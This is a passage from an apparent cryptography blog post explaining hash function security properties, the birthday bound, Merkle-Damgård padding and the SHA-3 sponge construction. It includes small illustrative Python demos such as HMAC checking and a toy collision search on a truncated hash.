<p>There is also a <strong>birthday attack</strong> on CBC-MACs where you need <span class="math">\(q \approx 2^{t/2}\)</span> queries to obtain the MAC value for a message <span class="math">\(x\)</span> that was not queried before. <span class="math">\(x\)</span> can be arbitrarily chosen, except that the first t-bit block is given. <span class="math">\(x\)</span> is a bitstring of length <span class="math">\(tn\)</span>. The attacker chooses <span class="math">\(n-2\)</span> arbitrary t-bit blocks and two times <span class="math">\(q\)</span> pairwise different t-bit blocks. He then queries the MAC values <span class="math">\(z_i = h_k(x^i)\)</span> for the selected messages. If there is a colliding pair among the computed MACs, he will find it.</p>
<p>The attack described above is an <span class="math">\((\epsilon, q+1)\)</span>-attack for <span class="math">\(q \approx 1.17\cdot2^{t/2}\)</span>. Only the last query is adaptive, all the <span class="math">\(q\)</span> prior queries are non-adaptive.</p>
<p>In general there are <strong>adaptive queries</strong>, where the query <span class="math">\(x_i\)</span> depends on the queries <span class="math">\(x_1, ..., x_{i-1}\)</span> before. Non-adaptive queries do not need knowledge about the prior queries. Then there are <strong>selective forgeries</strong>, where the attacker can obtain the MAC value for a message he has chosen. Finally there are <strong>existential forgeries</strong>, where the attacker can obtain a forgery but cannot choose for which message.</p>
<script type="text/javascript">if (!document.getElementById('mathjaxscript_pelican_#%@#$@#')) {
var align = "left",
indent = "0em",
linebreak = "false";
if (false) {
align = (screen.width < 768) ? "left" : align;
indent = (screen.width < 768) ? "0em" : indent;
linebreak = (screen.width < 768) ? 'true' : linebreak;
}
var mathjaxscript = document.createElement('script');
mathjaxscript.id = 'mathjaxscript_pelican_#%@#$@#';
mathjaxscript.type = 'text/javascript';
mathjaxscript.src = 'https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.3/latest.js?config=TeX-AMS-MML_HTMLorMML';
var configscript = document.createElement('script');
configscript.type = 'text/x-mathjax-config';
configscript[(window.opera ? "innerHTML" : "text")] =
"MathJax.Hub.Config({" +
" config: ['MMLorHTML.js']," +
" TeX: { extensions: ['AMSmath.js','AMSsymbols.js','noErrors.js','noUndefined.js'], equationNumbers: { autoNumber: 'none' } }," +
" jax: ['input/TeX','input/MathML','output/HTML-CSS']," +
" extensions: ['tex2jax.js','mml2jax.js','MathMenu.js','MathZoom.js']," +
" displayAlign: '"+ align +"'," +
" displayIndent: '"+ indent +"'," +
" showMathMenu: true," +
" messageStyle: 'normal'," +
" tex2jax: { " +
" inlineMath: [ ['\\\\(','\\\\)'] ], " +
" displayMath: [ ['$$','$$'] ]," +
" processEscapes: true," +
" preview: 'TeX'," +
" }, " +
" 'HTML-CSS': { " +
" availableFonts: ['STIX', 'TeX']," +
" preferredFont: 'STIX'," +
" styles: { '.MathJax_Display, .MathJax .mo, .MathJax .mi, .MathJax .mn': {color: 'black ! important'} }," +
" linebreaks: { automatic: "+ linebreak +", width: '90% container' }," +
" }, " +
"}); " +
"if ('default' !== 'default') {" +
"MathJax.Hub.Register.StartupHook('HTML-CSS Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax['HTML-CSS'].FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"MathJax.Hub.Register.StartupHook('SVG Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax.SVG.FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"}";
(document.body || document.getElementsByTagName('head')[0]).appendChild(configscript);
(document.body || document.getElementsByTagName('head')[0]).appendChild(mathjaxscript);
}
</script>Cryptographic Hash Functions2018-08-18T21:39:00+02:002018-08-19T15:00:00+02:00Nikolai Tschachertag:incolumitas.com,2018-08-18:/2018/08/18/cryptographic-hash-functions/<h2>Introduction</h2>
<p>This blog post will introduce cryptographic hash functions. We are going to discuss the <strong>Merkle-Damgård construction</strong> which underlies many hash functions that were and still are in use. The <strong>MD4, MD5, SHA-1 and SHA-2</strong> hash families are all functions that are built on top of the <strong>Merkle-Damgård construction</strong>. Then we will introduce an alternative construction that was popularized during the publication of <strong>Keccak (SHA-3)</strong>: The <strong>Sponge construction</strong>.</p>
<p>But what are cryptographic hash functions good for?</p>
<p>The general idea is to assign a unique and stable fingerprint to each input <span class="math">\(x\)</span>. This fingerprint is computed with a hash function <span class="math">\(h\)</span> and the resulting value <span class="math">\(y = h(x)\)</span> is called a message digest. The size of <span class="math">\(h(x)\)</span> is fixed, even though the input data <span class="math">\(x\)</span> may have arbitrary length. The intended task for <span class="math">\(h\)</span> is to assign a unique identification code <span class="math">\(h(x)\)</span> to each input <span class="math">\(x \in X\)</span> where <span class="math">\(X\)</span> is the set of all possible inputs. The avid reader might realize that this task is impossible, since there is no injective function that maps an infinitely large input set <span class="math">\(X\)</span> to a finite set of fixed-size outputs <span class="math">\(h(x)\)</span>. Thus there must be collisions: For some inputs <span class="math">\(x_1 \neq x …</span></p><h2>Introduction</h2>
<p>This blog post will introduce cryptographic hash functions. We are going to discuss the <strong>Merkle-Damgård construction</strong> which underlies many hash functions that were and still are in use. The <strong>MD4, MD5, SHA-1 and SHA-2</strong> hash families are all functions that are built on top of the <strong>Merkle-Damgård construction</strong>. Then we will introduce an alternative construction that was popularized during the publication of <strong>Keccak (SHA-3)</strong>: The <strong>Sponge construction</strong>.</p>
<p>But what are cryptographic hash functions good for?</p>
<p>The general idea is to assign a unique and stable fingerprint to each input <span class="math">\(x\)</span>. This fingerprint is computed with a hash function <span class="math">\(h\)</span> and the resulting value <span class="math">\(y = h(x)\)</span> is called a message digest. The size of <span class="math">\(h(x)\)</span> is fixed, even though the input data <span class="math">\(x\)</span> may have arbitrary length. The intended task for <span class="math">\(h\)</span> is to assign a unique identification code <span class="math">\(h(x)\)</span> to each input <span class="math">\(x \in X\)</span> where <span class="math">\(X\)</span> is the set of all possible inputs. The avid reader might realize that this task is impossible, since there is no injective function that maps an infinitely large input set <span class="math">\(X\)</span> to a finite set of fixed-size outputs <span class="math">\(h(x)\)</span>. Thus there must be collisions: For some inputs <span class="math">\(x_1 \neq x_2 \in X: h(x_1) = h(x_2)\)</span>. It turns out that the whole fuss in hash function security revolves around whether collisions for a hash function can be found and how.</p>
<p>The security services that are achieved with hash functions are:</p>
<ul>
<li><strong>Message authentication: </strong> This security service makes sure that a message is not altered in transmission. This property is also called <strong>Integrity</strong>. This property additionally ensures that the sender of the message unequivocally created the message. Only he knows what <span class="math">\(x\)</span> must have been, since only <span class="math">\(h(x)\)</span> was transmitted.</li>
<li><strong>Entity authentication: </strong> Enables entities to verify themselves.</li>
</ul>
<p>Hash functions without keys are sometimes also called Manipulation Detection Codes (MDC). As the name suggests, their main task is to ensure <strong>Integrity</strong>. Note that a MITM attacker <em>Oscar</em> can replace <span class="math">\((x, h(x))\)</span> with his own MDC <span class="math">\((x', h(x'))\)</span> and <em>Bob</em> has no way to recognize that this message didn't originate from <em>Alice</em>.</p>
<p>If Alice wants to authenticate her message, she must use a <strong>Message Authentication Code (MAC)</strong>. A MAC is essentially a hash function that cryptographically hashes a message together with a symmetric key: <span class="math">\(y = h_k(x)\)</span>. Alice and Bob must share an identical secret key <span class="math">\(k\)</span>. They can obtain the secret key <span class="math">\(k\)</span> by using an asymmetric key exchange protocol like the <strong>Diffie-Hellman Key Exchange</strong> that is based on public key cryptography. Now when Alice sends her MAC <span class="math">\((x, h_k(x))\)</span> to Bob and Oscar replaces the message with <span class="math">\((x, h_{\tilde{k}}(x))\)</span> using his own key <span class="math">\(\tilde{k}\)</span>, Bob can detect that the message was tampered with since <span class="math">\(h_{\tilde{k}}(x) \neq h_k(x)\)</span>. For this reason the message is said to be authenticated as long as only Alice and Bob share the secret key <span class="math">\(k\)</span>. When Bob receives a pair <span class="math">\((x', MAC)\)</span> and verifies that <span class="math">\(MAC = h_k(x')\)</span>, Bob can be sure that Alice created the message, because only Alice and he know the secret key <span class="math">\(k\)</span>.</p>
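<p>A minimal sketch of this exchange is shown below. It uses HMAC-SHA256 from the Python standard library as one concrete choice for <span class="math">\(h_k\)</span>. The keys, the messages and the helper names <code>tag</code> and <code>verify</code> are made up for illustration.</p>

```python
import hashlib
import hmac

def tag(key: bytes, message: bytes) -> bytes:
    """Compute the MAC h_k(x), here instantiated with HMAC-SHA256."""
    return hmac.new(key, message, hashlib.sha256).digest()

def verify(key: bytes, message: bytes, received_tag: bytes) -> bool:
    """Bob recomputes the MAC and compares it in constant time."""
    return hmac.compare_digest(tag(key, message), received_tag)

shared_key = b"key shared by Alice and Bob"
oscar_key = b"key chosen by Oscar"
message = b"transfer 10 EUR"

# Alice's genuine message is accepted.
print(verify(shared_key, message, tag(shared_key, message)))               # True
# A MAC computed with Oscar's key is rejected.
print(verify(shared_key, message, tag(oscar_key, message)))                # False
# A modified message with Alice's old MAC is rejected as well.
print(verify(shared_key, b"transfer 1000 EUR", tag(shared_key, message)))  # False
```

<p><code>hmac.compare_digest</code> is used instead of <code>==</code> so that the comparison time does not leak how many bytes of a forged MAC were correct.</p>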
<h2>Keyless Hash Functions (MDC)</h2>
<p>We assume in the following chapter that <span class="math">\(h\)</span> is a publicly known hash function such as MD5 or SHA-1. Some definitions and symbols introduced:</p>
<ul>
<li><span class="math">\(h: X \rightarrow Y\)</span> is the hash function where <span class="math">\(X\)</span> is the set of all possible messages and <span class="math">\(Y\)</span> is the set of all possible hash values. <span class="math">\(\bigm| X \bigm| = n\)</span> and <span class="math">\(\bigm| Y \bigm| = m\)</span></li>
<li>If <span class="math">\(X\)</span> is finite, we require that <span class="math">\(n \geq 2m\)</span> and we call <span class="math">\(h\)</span> a <strong>compression function</strong>. This makes intuitive sense since <span class="math">\(X\)</span> is at least double the size of <span class="math">\(Y\)</span> and <span class="math">\(h\)</span> compresses the elements of <span class="math">\(X\)</span> into the smaller set <span class="math">\(Y\)</span>.</li>
</ul>
<p>Now the main requirement for hash functions is the one-wayness of <span class="math">\(h\)</span>. This means that <span class="math">\(y = h(x)\)</span> can be easily computed given a message <span class="math">\(x\)</span>, but the reverse, to find an <span class="math">\(x\)</span> given a message digest <span class="math">\(y\)</span>, </p>
<div class="math">$$x=h^{-1}(y)$$</div>
<p> should be computationally infeasible.</p>
<p>We introduce now the <strong>required security properties for hash functions</strong></p>
<h3>1. Preimage Resistance (One-Way hash function)</h3>
<p>It must be computationally unfeasible to find a message <span class="math">\(x \in X\)</span> given <span class="math">\(y=h(x)\)</span>. For example, if you find the password hashes in <code>/etc/shadow</code>, it must be computationally unfeasible to find a matching <span class="math">\(x\)</span> such that <span class="math">\(y=h(x)\)</span>.</p>
<p>In the real world, your best attack would be to just try a word-list attack. But if the password <span class="math">\(x\)</span> was truly randomly chosen and is 512 bits long, you will not recover <span class="math">\(x\)</span> from <span class="math">\(y\)</span> in this or in the next thousand generations unless <span class="math">\(h\)</span> is flawed (and not preimage resistant).</p>
<h3>2. Second Preimage Resistance (Weak Collision Resistance)</h3>
<p>It must be computationally unfeasible to find an <span class="math">\(x' \in X \setminus \{x\}\)</span> such that <span class="math">\(h(x') = h(x)\)</span> given a text <span class="math">\(x\)</span> and <span class="math">\(y=h(x)\)</span>. In words: Given an <span class="math">\(x\)</span>, it is computationally hard to find another <span class="math">\(x'\)</span> that hashes to the same value. Note that <span class="math">\(x \neq x'\)</span>.</p>
<h3>3. Strong Collision Resistance</h3>
<p>It must be computationally unfeasible to find two messages <span class="math">\(x, x' \in X\)</span> such that <span class="math">\(h(x) = h(x')\)</span>. Note that <span class="math">\(x \neq x'\)</span>.</p>
<h3>Comparison of Security Properties</h3>
<p>Note that strong collision resistance is a much tougher security property to achieve, since the attacker can choose any <span class="math">\(x\)</span> and <span class="math">\(x'\)</span> (Two degrees of freedom). Second preimage resistance instead fixes <span class="math">\(x\)</span> and requires the attacker to find another <span class="math">\(x'\)</span> that hashes to the same value as <span class="math">\(x\)</span> (1 degree of freedom).</p>
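<p>It can be proven that strongly collision resistant hash functions are preimage resistant and weakly collision resistant.</p>
<p>It's obvious that a strongly collision resistant hash function is also weakly collision resistant: an attacker who can find a second preimage <span class="math">\(x'\)</span> for a fixed message <span class="math">\(x\)</span> has thereby found a collision <span class="math">\((x, x')\)</span>.</p>
<p>But why is a strongly collision resistant hash function also preimage resistant (a one-way function)? A proof sketch by contraposition: suppose we could efficiently find a preimage for any given <span class="math">\(y\)</span>. Pick a random <span class="math">\(x \in X\)</span>, compute <span class="math">\(y=h(x)\)</span> and ask for a preimage <span class="math">\(x'\)</span> of <span class="math">\(y\)</span>. Because <span class="math">\(h\)</span> compresses (<span class="math">\(n \geq 2m\)</span>), many messages share a hash value, so with good probability <span class="math">\(x' \neq x\)</span> and <span class="math">\((x, x')\)</span> is a collision with <span class="math">\(h(x) = h(x')\)</span>. An efficient preimage finder would therefore yield an efficient collision finder, which cannot exist for a strongly collision resistant hash function.</p>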
<h3>The Random Oracle Model (ROM)</h3>
<p>We introduce a model where we obtain an upper bound of the resources needed to launch an attack against hash functions <span class="math">\(h\)</span>. The ROM gives us an idealized cryptographic hash function such that we obtain a random function <span class="math">\(h: X \rightarrow Y\)</span> from all possible <span class="math">\(m^n\)</span> functions.</p>
<p>This means that an attacker gets to know how the hash function works only if he asks the ROM for the hash values of a series of messages. Because the ROM creates a random hash function, it remains hard to predict <span class="math">\(h(x)\)</span> if the attacker receives a series of hash values for some messages. In reality, <span class="math">\(h\)</span> is not random and the attacker does know how the hash functions work. However, those public functions are intended to behave like a ROM.</p>
<p>Therefore the ROM requires that <span class="math">\(Pr(h(x)=y|h(x_i) = y_i \text{ for } i=1,..,k) = \frac{1}{m}\)</span> for every message <span class="math">\(x\)</span> that was not queried before. In words: Even though the attacker knows <span class="math">\(k\)</span> hash values for <span class="math">\(k\)</span> texts, he cannot predict what the next text <span class="math">\(x_{k+1}\)</span> hashes to with a probability better than <span class="math">\(1/m\)</span>.</p>
<p>Now what is the probability that an attacker in the ROM finds a pre-image for some <span class="math">\(y=h(x)\)</span>?</p>
<p>If the attacker Oscar queries the ROM <span class="math">\(q\)</span> times with messages <span class="math">\(\{x_1, x_2, ..., x_q\}\)</span> and the probability to query with a <em>correct</em> <span class="math">\(x_i\)</span> remains <span class="math">\(1/m\)</span> (as suggested), then the probability to <strong>not find a pre-image in q queries</strong> is <span class="math">\((1-\frac{1}{m})^q\)</span>. The probability to find such a pre-image is </p>
<div class="math">$$1-(1-\frac{1}{m})^q \approx q/m$$</div>
<p> The probability to find a second pre-image (weak collision resistance) is accordingly </p>
<div class="math">$$1-(1-\frac{1}{m})^{q-1} \approx q/m$$</div>
<p>To get a <span class="math">\(50\%\)</span> chance to find a pre-image, you need to query the ROM with about <span class="math">\(q=m/2\)</span> queries. When the hash function has <span class="math">\(m = 2^{160}\)</span> possible outputs (an output length of 160 bits), you will need to query about <span class="math">\(2^{159}\)</span> times.</p>
<h4>Attack on Collision Resistance with Birthday Paradox</h4>
<p>The birthday paradox demonstrates a way to attack hash functions with strong collision resistance. It states that the probability to find a collision <span class="math">\((x, x')\)</span> is </p>
<div class="math">$$p=1-\frac{(m-1)(m-2)\cdots(m-q+1)}{m^{q-1}}$$</div>
<p> when you query the ROM with <span class="math">\(q\)</span> messages <span class="math">\(x_1, ..., x_q\)</span>.</p>
<p>This makes intuitive sense, since the probability to find a collision depends on whether any pair among the message digests of your queries yields a tuple <span class="math">\((x, x')\)</span> for which <span class="math">\(h(x) = h(x')\)</span>. If the first <span class="math">\(q\)</span> queries produced <span class="math">\(q\)</span> distinct digests, the <span class="math">\((q+1)\)</span>-th query collides with one of them with a probability of <span class="math">\(q/m\)</span>. For the <span class="math">\((q+2)\)</span>-th query the probability rises to <span class="math">\(\frac{q+1}{m}\)</span>. This observation can be written formally as </p>
<div class="math">$$p = 1 - \frac{m-1}{m}\cdot\frac{m-2}{m} \cdots \frac{m-q+1}{m}$$</div>
<p> For what <span class="math">\(q\)</span> do we achieve a probability for a collision of <span class="math">\(0.5\)</span>?</p>
<p>Let <span class="math">\(p\)</span> be the probability to find a collision after <span class="math">\(q\)</span> queries. For small <span class="math">\(x\)</span> we can use the approximation </p>
<div class="math">$$1-x \approx e^{-x}$$</div>
<p>Then <span class="math">\(p = 1-\prod_{i=1}^{q-1} \left(1-i/m\right) \approx 1-\prod_{i=1}^{q-1} e^{-i/m} = 1-e^{-\frac{q(q-1)}{2m}} \approx 1-e^{-\frac{q^2}{2m}}\)</span> and solving for <span class="math">\(q\)</span> we see </p>
<div class="math">$$q \approx \sqrt{2m \ln\frac{1}{1-p}}$$</div>
<p>For <span class="math">\(p = 0.5\)</span>, we obtain an estimation for <span class="math">\(q\)</span> as </p>
<div class="math">$$q \approx c\sqrt{m}$$</div>
<p> with the constant <span class="math">\(c=\sqrt{2 \ln 2} \approx 1.17\)</span>.</p>
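<p>The estimate can be compared with the exact product formula. The sketch below uses the classic birthday setting <span class="math">\(m = 365\)</span> as an illustrative value. The function names are assumptions.</p>

```python
import math

def collision_probability(q: int, m: int) -> float:
    """Exact p = 1 - prod_{i=1}^{q-1} (1 - i/m) in the random oracle model."""
    no_collision = 1.0
    for i in range(1, q):
        no_collision *= 1 - i / m
    return 1 - no_collision

def approx_probability(q: int, m: int) -> float:
    """Approximation p = 1 - exp(-q^2 / (2m))."""
    return 1 - math.exp(-q * q / (2 * m))

m = 365                                # number of possible "hash values"
q = math.ceil(1.17 * math.sqrt(m))     # estimate q = c * sqrt(m)

print(q)                               # 23
print(collision_probability(q, m))     # slightly above 0.5
print(approx_probability(q, m))        # close to the exact value
```

<p>With 23 queries the collision probability just exceeds one half, which is the well known birthday paradox result for 365 days.</p>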
<p>This essentially means that with the <strong>Birthday Attack</strong>, to obtain a fifty-fifty chance to find a collision, we need to query the ROM about <span class="math">\(\sqrt{m}\)</span> times. For a hash function with an output length of <span class="math">\(l\)</span> bits we have <span class="math">\(m = 2^l\)</span>, so roughly <span class="math">\(\sqrt{2^l} = 2^{l/2}\)</span> queries are needed. For example, you need to calculate about <span class="math">\(2^{128/2} = 2^{64}\)</span> MD5 hashes to find a collision with this generic attack. This is feasible nowadays.</p>
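<p>The birthday attack is easy to try out on a hash function with a short output. The sketch below truncates SHA-256 to 24 bits, a toy length chosen so that the search finishes quickly. The truncation, the message format and the function names are assumptions for this demonstration.</p>

```python
import hashlib
from itertools import count

BITS = 24  # toy digest length; real hash functions use 128 bits or more

def truncated_hash(data: bytes) -> int:
    """First BITS bits of SHA-256, interpreted as an integer."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - BITS)

def birthday_attack():
    """Hash distinct messages until two of them share a digest."""
    seen = {}
    for i in count():
        msg = b"message-%d" % i
        digest = truncated_hash(msg)
        if digest in seen:
            return seen[digest], msg, i + 1   # colliding pair and number of queries
        seen[digest] = msg

x, x2, queries = birthday_attack()
print(x, x2, queries)
print("expected order of magnitude:", 2 ** (BITS // 2))
```

<p>The number of queries is typically a small multiple of <span class="math">\(2^{12} = 4096\)</span>, far below the <span class="math">\(2^{24}\)</span> possible digests.</p>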
<h3>Merkle-Damgård Construction and Iterated Hash functions</h3>
<p>Given a collision resistant compression function </p>
<div class="math">$$h: \{0,1\}^{m} \times \{0,1\}^{t} \rightarrow \{0,1\}^{m}$$</div>
<p> the goal of iterated hash functions (such as the Merkle-Damgård Construction) is to create a collision-resistant hash function <span class="math">\(\tilde{h}\)</span> </p>
<div class="math">$$\tilde{h}: \{0,1\}^{\ast} \rightarrow \{0,1\}^{l}$$</div>
<p> that hashes arbitrarily sized messages to a message digest of bitlength <span class="math">\(l\)</span>. Note that the compression function takes two inputs, one with bitlength <span class="math">\(m\)</span> and one with bitlength <span class="math">\(t\)</span>.</p>
<p>In words: The main task of the Merkle-Damgård Construction (MD) is to extend the domain of a collision free compression function to arbitrarily sized messages. MD divides arbitrarily sized messages into fixed blocks and adds a secure padding (preprocessing step). Then MD uses the output of the compression function of one block as the input together with the next block for a new iteration of the compression function until all blocks have been processed (processing step). Formally, those steps can be written as:</p>
<ul>
<li><strong>Preprocessing: </strong>Transform any input <span class="math">\(x \in \{0,1\}^{\ast}\)</span> into <span class="math">\(r\)</span> blocks of size <span class="math">\(t\)</span> such that the length of the transformed string <span class="math">\(y(x) = y_1||y_2||...||y_r\)</span> is divisible by <span class="math">\(t\)</span>: <span class="math">\(|y(x)| \equiv_t 0\)</span>. As we will see, MD adds a certain padding in the preprocessing step in order for the construction to be secure.</li>
<li><strong>Processing: </strong> <span class="math">\(\text{IV}\)</span> is a publicly known initialization vector of size <span class="math">\(m\)</span> (<span class="math">\(m\)</span> zero Bits in the case of MD). We compute a series of values <span class="math">\(z_0, z_1, ..., z_r\)</span> by calling the compression function <span class="math">\(r\)</span> times such that <div class="math">$$z_0 = \text{IV}$$</div> and <div class="math">$$z_i = h(z_{i-1} || y_i)$$</div>
</li>
<li><strong>Final Step: </strong> Output <span class="math">\(z_r\)</span> as the final hash value, then <span class="math">\(m=l\)</span>. Optionally transform <span class="math">\(z_r\)</span> with a final transformation function <span class="math">\(\text{transform}: \{0,1\}^{m} \rightarrow \{0,1\}^{l}\)</span></li>
</ul>
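<p>The three steps above can be sketched in a few lines. This is a toy illustration and not a real hash function: SHA-256 serves as a stand-in for the compression function, the padding is a simplified length padding (zero fill plus one block holding the message length), and the sizes and names are assumptions.</p>

```python
import hashlib

T = 64          # block size t in bytes
M = 32          # chaining value size m in bytes
IV = bytes(M)   # publicly known all-zero IV

def compress(z, block):
    """Stand-in compression function h: {0,1}^m x {0,1}^t -> {0,1}^m."""
    return hashlib.sha256(z + block).digest()[:M]

def preprocess(x):
    """Zero-fill the last data block, then append one block encoding len(x)."""
    padded = x + bytes(-len(x) % T)
    padded += len(x).to_bytes(T, "big")
    return [padded[i:i + T] for i in range(0, len(padded), T)]

def md_hash(x):
    z = IV                        # z_0 = IV
    for y_i in preprocess(x):
        z = compress(z, y_i)      # z_i = h(z_{i-1} || y_i)
    return z                      # output z_r without a final transformation

print(len(preprocess(b"Hello")))  # 2 blocks: data block and length block
print(md_hash(b"Hello").hex())
```

<p>Because the message length is part of the last block, messages that differ only in trailing zero bytes no longer hash to the same value.</p>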
<p>We want the preprocessing function <span class="math">\(y\)</span> to be <strong>suffix free</strong>, because we can then prove that our final hash function <span class="math">\(\tilde{h}\)</span> is collision resistant. In other words: The goal is to prove that we can find a collision in the hash function only if we can find a collision in the compression function.</p>
<p>Our preprocessing function <span class="math">\(y\)</span> is suffix free, if there are no strings <span class="math">\(x \neq x', z \in \{0,1\}^{\ast}\)</span> such that <span class="math">\(y(x) = z||y(x')\)</span>. A suffix in computer science is usually something added at the end of a string, such as the file ending <code>.txt</code>.</p>
<p><span class="math">\(y\)</span> would <strong>NOT</strong> be suffix free, if messages would just be padded with constant zeroes in order to form a message that is a multiple of <span class="math">\(t\)</span>: <span class="math">\(|y(x)| \equiv_t 0\)</span>.</p>
<p>Example: If <span class="math">\(t=8 \text{ Bytes}\)</span> and we have the two messages <span class="math">\(x=\text{Hello} \neq x'=\text{Hello00}\)</span> and pad them with our zero padding, we obtain a collision <span class="math">\(y(x) = y(x')\)</span> even though <span class="math">\(x \neq x'\)</span>. Therefore zero padding is an insecure padding.</p>
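<p>The example can be replayed directly. In the sketch below the padding symbol is the character <code>0</code>, as in the example. The second function shows, as an assumption about one possible fix, how appending a block with the original length separates the two messages. Both function names are made up.</p>

```python
T = 8  # block size in bytes, as in the example

def zero_pad(x: bytes) -> bytes:
    """Insecure padding: fill up to a multiple of T with the character '0'."""
    return x + b"0" * (-len(x) % T)

def length_pad(x: bytes) -> bytes:
    """Zero padding followed by one block that encodes the original length."""
    return zero_pad(x) + len(x).to_bytes(T, "big")

print(zero_pad(b"Hello"), zero_pad(b"Hello00"))      # both b'Hello000'
print(length_pad(b"Hello") == length_pad(b"Hello00"))  # False
```

<p>Since both padded strings are identical, every hash function applied afterwards produces the same digest for the two different messages.</p>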
<p>There are many Merkle-Damgård compliant padding schemes. The original padding scheme is <strong>length-padding</strong>, whereby <span class="math">\(r\)</span> blocks of size <span class="math">\(t\)</span> are created. The first bit of each block is always 1 (except in the first block, where the first bit is a 0). In the <span class="math">\((r-1)\text{th}\)</span> block of the padding we fill the remaining space with exactly <span class="math">\(d\)</span> zero bits. In the <span class="math">\(r\text{-th}\)</span> block we binary encode <span class="math">\(d\)</span>. Alternatively we can binary encode the length of the whole message in the last block. It's the same, because <span class="math">\(d\)</span> is a function of the size of the message.</p>
<p>In short, <strong>length-padding</strong> transforms an input message in such a way that there are <span class="math">\(r\)</span> blocks of size <span class="math">\(t\)</span> and the next to last block is filled with zero bits in order to obtain a length of the block size <span class="math">\(t\)</span>. The last block is a binary representation of the original message length. The message length encoding must be at a fixed position in the last block to be resistant against length extension attacks.</p>
<p>It turns out that length encoding is the simplest form of a padding that is suffix free. You can read the formally correct proof here: <a href="https://eprint.iacr.org/2009/325.pdf">Characterizing Padding Rules of MD Hash Functions
Preserving Collision Security</a>.</p>
<p>The informal proof sketch is taken from <a href="https://crypto.stackexchange.com/questions/1427/why-does-the-padding-in-merkle-damg%C3%A5rd-hash-functions-like-md5-contain-the-messa">stackexchange</a>. Assume we have a collision in our hash function. We show that there must be a collision in the underlying compression function if two distinct inputs are length-padded (and thus suffix free).</p>
<ul>
<li>If the distinct messages have different length, then a collision in the compression function must occur in the last block, because the last block holds the binary length of the message and the length is different, even though the value of the compression function is identical.</li>
<li>If the messages are of the same length, then there is a well defined rightmost block in the MD-chain where the messages differ, but the output of the compression function is equal. Thus the collision is in the compression function. It can be shown by induction that somewhere in the chain there must be two distinct inputs to the compression function which yield an identical output.</li>
</ul>
<h3>Hash Functions based on the Merkle-Damgård Construction</h3>
<p>MD4, MD5, SHA-1 and SHA-2 are all based on the MD construction. MD4 and MD5 use little endian representation of words, SHA uses big endian. The compression function of MD4 (1990) is broken: it is possible to find collisions after <span class="math">\(2^{20}\)</span> queries to the ROM. MD5 (1991) is an improved version of MD4, with an additional fourth round and other constants in the compression function. MD5 is also not collision resistant anymore and shouldn't be used any longer.</p>
<p>SHA-1 is also based on the MD construction and is the successor of the MD4, MD5 family. Instead of 128 bit output length, SHA-1 has 160 bit output length. SHA-1 is still in use today, but since a practical collision was published in 2017 it should no longer be relied on where collision resistance matters.</p>
<p>In 2001 and 2004 NIST published 224, 256, 384 and 512 bit variants of the SHA family. They are regarded as the SHA-2 family. The output length varies and the internal functionality, such as the number of rounds, shift amounts and constants of the compression function, differs from SHA-1.</p>
<p>In 2012 Keccak (SHA-3) was presented as the successor of SHA-1 and SHA-2. Although SHA-2 is still considered secure, SHA-3 is built on a completely different architecture than the Merkle-Damgård Construction. The idea is to have a strong and standardized hash function that doesn't build on the MD construction.</p>
<h3>Sponge Construction and Keccak (SHA-3)</h3>
<p>The sponge construction is the internal architecture of the SHA-3 hash function. It can be used to compute a hash value or to generate pseudo-random bits. Keccak can be divided into two phases:</p>
<ul>
<li><strong>Absorbing phase</strong>: Message blocks are passed to the algorithm.</li>
<li><strong>Squeezing phase</strong>: Output of configurable length is computed. When Keccak is used as SHA-3, only <span class="math">\(y_0\)</span> of <span class="math">\(y_0, ..., y_n\)</span> is taken from the output.</li>
</ul>
<p>Illustration of the sponge construction (Image from Wikipedia):</p>
<p><img alt="sponge construction" src="https://upload.wikimedia.org/wikipedia/commons/7/70/SpongeConstruction.svg"></p>
<p>Instead of using a compression function, the sponge construction internally uses a permutation </p>
<div class="math">$$f: \{0,1\}^b \rightarrow \{0,1\}^b$$</div>
<p> which is applied iteratively. Here <span class="math">\(b = r+c\)</span>, whereby <span class="math">\(c\)</span> is called the capacity and is considered to be the internal state of the sponge construction. <span class="math">\(r\)</span> is called the bit rate and is equal to the length of a message block. <span class="math">\(r\)</span> is also said to be the external state of the sponge, because only the first <span class="math">\(r\)</span> bits are extracted in the squeezing phase.</p>
<p>For SHA-3 a state of <span class="math">\(b=1600\)</span> bits is used. The two combinations <span class="math">\((r,c) = (1344, 256)\)</span> and <span class="math">\((r,c) = (1088, 512)\)</span> are allowed.</p>
<p>Before the actual sponge construction can be used, a message is padded with a sponge conform padding function. The padding function <span class="math">\(\text{pad}\)</span> essentially looks like </p>
<div class="math">$$\text{pad(m)} = m||P10^{\ast}1$$</div>
<p> The padding function appends a bit string <span class="math">\(P\)</span>, followed by a 1, zero or more zeros and a terminating 1, to the input message <span class="math">\(m\)</span>. <span class="math">\(P\)</span> depends on the mode and the output length. After the padding, the length of the padded message is <span class="math">\(k \cdot r\)</span> bits, i.e. a multiple of the bit rate <span class="math">\(r\)</span>, where <span class="math">\(k\)</span> is the number of blocks.</p>
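<p>The padding rule can be sketched on bit strings as follows. This is only an illustration: bits are modelled as Python strings of <code>'0'</code> and <code>'1'</code>, the name <code>sponge_pad</code> is made up, and the mode dependent string <span class="math">\(P\)</span> is passed in as a parameter that defaults to the empty string.</p>

```python
def sponge_pad(message_bits: str, rate: int, p: str = "") -> str:
    """Return m || P || 1 0* 1 with a total length that is a multiple of rate."""
    body = message_bits + p
    # Two bits are always spent on the leading and the terminating 1.
    zeros = (-(len(body) + 2)) % rate
    return body + "1" + "0" * zeros + "1"


padded = sponge_pad("1101", rate=8)
print(padded, len(padded))
```

<p>Note that a message which is only one bit short of a block boundary gets a whole extra block, because the two mandatory 1 bits never fit into a single remaining position.</p>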
